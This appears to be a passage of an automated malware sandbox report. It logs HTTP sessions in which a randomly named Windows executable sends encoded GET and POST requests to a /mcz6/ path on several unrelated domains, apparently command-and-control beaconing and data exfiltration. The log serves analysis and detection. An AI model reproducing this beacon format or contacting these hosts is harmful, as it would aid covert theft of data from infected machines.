HYh7moSfTyjCD2yXoutM762oZ20oZUhrqqGOmTjrR72/y5KEBjf2SChyIlR1us6p5xCrAgcCCGNYZWo3dYY33/lzz08Vl+4eYqS2Q4EX5aa7tBHA37GTjdlmfYkqSa [TRUNCATED]
Jun 6, 2024 13:27:17.503837109 CEST	544	IN	HTTP/1.1 400 Server: ZGS Date: Thu, 06 Jun 2024 11:27:17 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 80 Connection: close Set-Cookie: 8ae64e9492=4f8d155d92baa51fc002217e6d409cd9; Path=/ Set-Cookie: csrfc=2d799d63-bf4d-4a56-93f1-ba59f75ecbd1;path=/;priority=high Set-Cookie: _zcsr_tmp=2d799d63-bf4d-4a56-93f1-ba59f75ecbd1;path=/;SameSite=Strict;priority=high Set-Cookie: JSESSIONID=1E2B12F3C7E825A809A58FA0A0A816EC; Path=/; HttpOnly Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 34 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 22 31 22 2c 22 64 65 76 65 6c 6f 70 65 72 5f 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 2e 22 7d 0a 0a Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49772	136.143.180.12	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:27:19.342073917 CEST	479	OUT	GET /mcz6/?l65lvjLx=5d/f0hfwoo/9d3f97tbdjxDk4KU85C4YC37M3UWhy4ALmXvbgMxGv66I6qe5jd4u2tKoxygbv/cknJWC1exftQvP2lviqJawgXV46wbQMN+Gc/xUQSNa8ks=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.jrksa.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:27:20.017352104 CEST	1236	IN	HTTP/1.1 404 Server: ZGS Date: Thu, 06 Jun 2024 11:27:19 GMT Content-Type: text/html Content-Length: 4635 Connection: close Set-Cookie: 8ae64e9492=9a53152e40f8a6327f1486af29c1a1cb; Path=/ Set-Cookie: csrfc=d7534557-ecb8-4273-a614-3dcc90c6b377;path=/;priority=high Set-Cookie: _zcsr_tmp=d7534557-ecb8-4273-a614-3dcc90c6b377;path=/;SameSite=Strict;priority=high Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0
Jun 6, 2024 13:27:20.017380953 CEST	1236	IN	Data Raw: 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 35 32 Data Ascii: 086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin-top:
Jun 6, 2024 13:27:20.017400026 CEST	1236	IN	Data Raw: 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 3b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: h3{ font-size:18px; font-family: "Open Sans"; font-weight:normal; font-weight:600; } .weight400{ font-weight:400; } .domain-color{
Jun 6, 2024 13:27:20.017493963 CEST	1236	IN	Data Raw: 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 20 0a 20 20 Data Ascii: (0, 0, 0, 0.12); color: #ffffff; font-size: 18px; font-weight: 300; padding: 10px 20px; text-decoration: none; position:relative; } </style>
Jun 6, 2024 13:27:20.017509937 CEST	212	IN	Data Raw: 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 77 69 64 74 68 3d 22 37 30 30 70 78 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 7a 6f 68 6f 2e 63 6f 6d 2f 73 69 74 65 73 2f 69 6d 61 67 65 73 2f 70 72 Data Ascii: <img width="700px" src="https://www.zoho.com/sites/images/professionally-crafted-themes.png" style="margin-top: 15px"> </div> </div> </div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49773	103.168.172.37	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:27:33.326678991 CEST	762	OUT	POST /mcz6/ HTTP/1.1 Host: www.celebration24.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.celebration24.co.uk Referer: http://www.celebration24.co.uk/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 62 4f 55 34 4b 74 5a 31 4d 32 68 57 63 75 62 72 52 34 76 64 4f 32 66 61 38 4e 62 4b 4e 47 59 73 70 6d 42 7a 6b 50 72 64 44 59 38 68 62 45 30 48 56 68 5a 37 53 30 5a 4e 43 6d 78 6e 2f 4c 34 48 34 55 35 69 37 76 37 64 6b 51 4e 35 76 71 6f 56 77 4a 2b 56 6f 47 52 54 66 73 77 57 7a 79 30 79 4a 7a 61 58 48 37 7a 4e 57 58 6f 7a 36 2b 31 73 63 32 75 6e 6c 54 42 52 33 45 2b 72 7a 61 6e 71 6c 32 6d 56 50 67 41 61 49 64 47 34 50 68 72 58 41 4c 31 33 6d 6e 78 35 56 2b 6d 41 52 76 76 42 4f 79 5a 35 68 4d 78 59 6c 79 79 47 47 6e 61 6b 37 2b 79 4a 77 37 2b 4e 32 68 70 64 71 4c 30 6d 59 41 3d 3d Data Ascii: l65lvjLx=bOU4KtZ1M2hWcubrR4vdO2fa8NbKNGYspmBzkPrdDY8hbE0HVhZ7S0ZNCmxn/L4H4U5i7v7dkQN5vqoVwJ+VoGRTfswWzy0yJzaXH7zNWXoz6+1sc2unlTBR3E+rzanql2mVPgAaIdG4PhrXAL13mnx5V+mARvvBOyZ5hMxYlyyGGnak7+yJw7+N2hpdqL0mYA==
Jun 6, 2024 13:27:34.010615110 CEST	570	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 06 Jun 2024 11:27:33 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close x-backend: web4 X-Frontend: frontend1 X-Trace-Id: ti_235166fc167b9a9c3b02d474425d4b16 Content-Encoding: br Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=\|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49774	103.168.172.37	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:27:36.539280891 CEST	782	OUT	POST /mcz6/ HTTP/1.1 Host: www.celebration24.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.celebration24.co.uk Referer: http://www.celebration24.co.uk/mcz6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 62 4f 55 34 4b 74 5a 31 4d 32 68 57 66 4e 54 72 54 62 48 64 5a 6d 65 6f 35 4e 62 4b 61 57 59 6f 70 6d 64 7a 6b 4b 4c 4e 57 37 49 68 59 67 77 48 55 67 5a 37 52 30 5a 4e 4e 47 78 69 37 4c 34 4d 34 55 45 56 37 75 48 64 6b 51 5a 35 76 72 59 56 78 36 47 53 75 57 52 52 54 4d 77 59 39 53 30 79 4a 7a 61 58 48 37 6d 6f 57 58 67 7a 36 75 46 73 4f 55 47 6b 6d 54 42 57 6a 55 2b 72 33 61 6e 75 6c 32 6d 33 50 6a 45 38 49 62 43 34 50 68 62 58 4f 36 31 34 76 6e 78 37 4b 75 6e 38 63 75 76 46 55 41 70 77 38 75 74 64 6a 6d 71 2f 4b 42 4c 2b 71 50 54 65 69 37 61 2b 72 6d 67 70 6e 49 4a 76 44 49 6a 44 66 6c 71 52 5a 67 39 78 71 7a 51 74 77 77 44 34 30 46 77 3d Data Ascii: l65lvjLx=bOU4KtZ1M2hWfNTrTbHdZmeo5NbKaWYopmdzkKLNW7IhYgwHUgZ7R0ZNNGxi7L4M4UEV7uHdkQZ5vrYVx6GSuWRRTMwY9S0yJzaXH7moWXgz6uFsOUGkmTBWjU+r3anul2m3PjE8IbC4PhbXO614vnx7Kun8cuvFUApw8utdjmq/KBL+qPTei7a+rmgpnIJvDIjDflqRZg9xqzQtwwD40Fw=
Jun 6, 2024 13:27:37.242130995 CEST	570	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 06 Jun 2024 11:27:37 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close x-backend: web4 X-Frontend: frontend1 X-Trace-Id: ti_6f2f09a6e780434d0c2716975d904b98 Content-Encoding: br Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=\|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49775	103.168.172.37	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:27:39.076478004 CEST	10864	OUT	POST /mcz6/ HTTP/1.1 Host: www.celebration24.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.celebration24.co.uk Referer: http://www.celebration24.co.uk/mcz6/ Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 62 4f 55 34 4b 74 5a 31 4d 32 68 57 66 4e 54 72 54 62 48 64 5a 6d 65 6f 35 4e 62 4b 61 57 59 6f 70 6d 64 7a 6b 4b 4c 4e 57 36 77 68 62 54 34 48 56 44 42 37 51 30 5a 4e 45 6d 78 6a 37 4c 34 64 34 55 63 52 37 75 4b 6d 6b 53 68 35 76 4e 45 56 32 4c 47 53 6e 57 52 52 62 73 77 5a 7a 79 30 6e 4a 7a 71 62 48 37 32 6f 57 58 67 7a 36 73 4e 73 59 32 75 6b 67 54 42 52 33 45 2b 64 7a 61 6e 43 6c 32 76 41 50 67 6f 4b 49 49 4b 34 50 46 33 58 43 6f 64 34 6b 6e 78 39 4c 75 6e 6b 63 72 32 62 55 41 6b 4a 38 76 5a 33 6a 68 4b 2f 41 48 69 67 76 74 44 30 2f 37 4c 6e 2f 30 55 79 72 35 39 72 44 59 76 33 52 56 6e 46 44 6b 35 53 6e 52 4a 5a 71 56 54 30 69 79 68 42 56 37 59 4a 65 34 31 31 72 6a 69 69 48 51 30 38 71 4d 52 53 58 59 74 34 43 79 6d 37 51 6c 36 6e 30 4c 61 7a 4a 43 77 56 6f 32 4f 48 35 4f 2b 55 77 6b 32 31 71 4d 61 74 38 4d 52 54 51 78 48 78 53 63 50 68 77 45 37 55 72 65 4c 2b 2f 48 75 31 64 6c 76 34 41 4b 32 44 34 41 45 5a 4b 6f 44 74 76 6c 53 79 54 38 37 42 56 76 6e 79 34 63 72 4a 58 [TRUNCATED] Data Ascii: l65lvjLx=bOU4KtZ1M2hWfNTrTbHdZmeo5NbKaWYopmdzkKLNW6whbT4HVDB7Q0ZNEmxj7L4d4UcR7uKmkSh5vNEV2LGSnWRRbswZzy0nJzqbH72oWXgz6sNsY2ukgTBR3E+dzanCl2vAPgoKIIK4PF3XCod4knx9Lunkcr2bUAkJ8vZ3jhK/AHigvtD0/7Ln/0Uyr59rDYv3RVnFDk5SnRJZqVT0iyhBV7YJe411rjiiHQ08qMRSXYt4Cym7Ql6n0LazJCwVo2OH5O+Uwk21qMat8MRTQxHxScPhwE7UreL+/Hu1dlv4AK2D4AEZKoDtvlSyT87BVvny4crJXoY5ysBFoHZlhs8biF8ghonVFMeyTYwy/CnfwbMjauw9ayWkhTpE6CJBh3oL47AEHm0gMJlHLdUXmIqEq4Rv+3rZ0brwTXXMAk7YjIkArZK4VRTg4WZCMvdHEHjCEcRnWkmM5ajzUdRqNWQLGF7xW4zmKd+PT06b9pY6yqmNmtx7UYw94rGdh1bB3Oy1Vou6xwDOo9KTQQC8jVB0QJ8Y55uEkhIZCPgTqFkcfeBlJnJgapk5o9GFhQ8DiOkDPoIH7xxCAMHghgUwBzOC/SjFerLpV78wxoZlMNq8VelPYQE0v+5IktKGaYYMxOAXCUdUrNs5ooTE/R7pekJWT+3FLpYREpfCvmOjo8mFkVqNMHTcVR+BzLVAV5PoAoH2P///1kvXux8F98cwRR2JIeUfJZwsHrUf8TYQUz7gSUzFUvUxWSXJjw1oGTPUcOgXMpKffQD3y1auf3nAyLZvFFkL24nHOJFDwRvPs2XiHKcbtjcxWqhtMcfdOZYvrHPRu5Jt34EQCCOsHcAKi0sDf5MB7MyuLU6ladgM7Xu62UgPkhspreCERYuiYP5psloLbEvCef1RLuq5cb3plP9DtfxEsmwfl+Yoau2bCUVMbqwHmhcdVvz1/en4jfO+M/mNHF0j4v1Nouwc4+4/7OecZBeAgI2OyxRUquK7PjO [TRUNCATED]
Jun 6, 2024 13:27:39.754112005 CEST	570	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 06 Jun 2024 11:27:39 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close x-backend: web4 X-Frontend: frontend1 X-Trace-Id: ti_4958f8e849f6a9bef174788291989cde Content-Encoding: br Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=\|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49776	103.168.172.37	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:27:41.611068010 CEST	488	OUT	GET /mcz6/?l65lvjLx=WM8YJa5qA0NkIP/fN4mRPH2hsfvjO1kWxn5RlfXsP+w6QT8BWCtnYGsQFWxr+5Q3wXsj3+rXjilTrq1L87WN5VMBaPcH6h4tJWWqH5H+VkhDr+c9eHm1vWk=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.celebration24.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:27:42.289258003 CEST	796	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 06 Jun 2024 11:27:42 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 544 Connection: close x-backend: web4 X-Frontend: frontend1 X-Trace-Id: ti_facf77dc240d3c811795c41071752919 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49777	104.37.39.71	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:27:47.437482119 CEST	762	OUT	POST /mcz6/ HTTP/1.1 Host: www.gledingakademiet.no Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.gledingakademiet.no Referer: http://www.gledingakademiet.no/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 43 44 53 5a 69 62 37 68 6f 6a 76 56 39 51 45 69 31 64 7a 7a 54 42 71 56 4a 34 6f 5a 64 56 76 4a 73 62 42 55 64 7a 52 39 6a 4c 47 6c 42 50 64 73 48 6c 4b 51 43 5a 5a 39 43 6b 5a 74 41 41 57 36 69 44 75 6f 49 43 73 55 42 49 68 37 51 79 48 49 30 58 51 76 64 37 30 6b 45 37 72 6b 4f 4f 76 48 73 6e 41 4a 6f 62 74 38 46 2b 72 78 78 33 52 5a 35 54 66 6b 4e 79 68 73 4d 68 4b 4f 4a 69 6e 68 32 34 6b 4f 68 73 72 4e 5a 50 6d 53 61 33 38 35 7a 74 30 33 6a 63 76 74 4f 51 4f 75 34 33 6a 6c 53 6e 56 51 36 76 35 61 5a 42 70 51 54 55 43 31 33 6e 69 74 65 42 63 2b 33 30 35 2b 66 6f 34 79 5a 67 3d 3d Data Ascii: l65lvjLx=CDSZib7hojvV9QEi1dzzTBqVJ4oZdVvJsbBUdzR9jLGlBPdsHlKQCZZ9CkZtAAW6iDuoICsUBIh7QyHI0XQvd70kE7rkOOvHsnAJobt8F+rxx3RZ5TfkNyhsMhKOJinh24kOhsrNZPmSa385zt03jcvtOQOu43jlSnVQ6v5aZBpQTUC13niteBc+305+fo4yZg==
Jun 6, 2024 13:27:48.320847988 CEST	161	IN	HTTP/1.1 404 Not Found Content-Length: 18 Content-Type: text/plain Date: Thu, 06 Jun 2024 11:27:48 GMT Server: Caddy Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49778	104.37.39.71	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
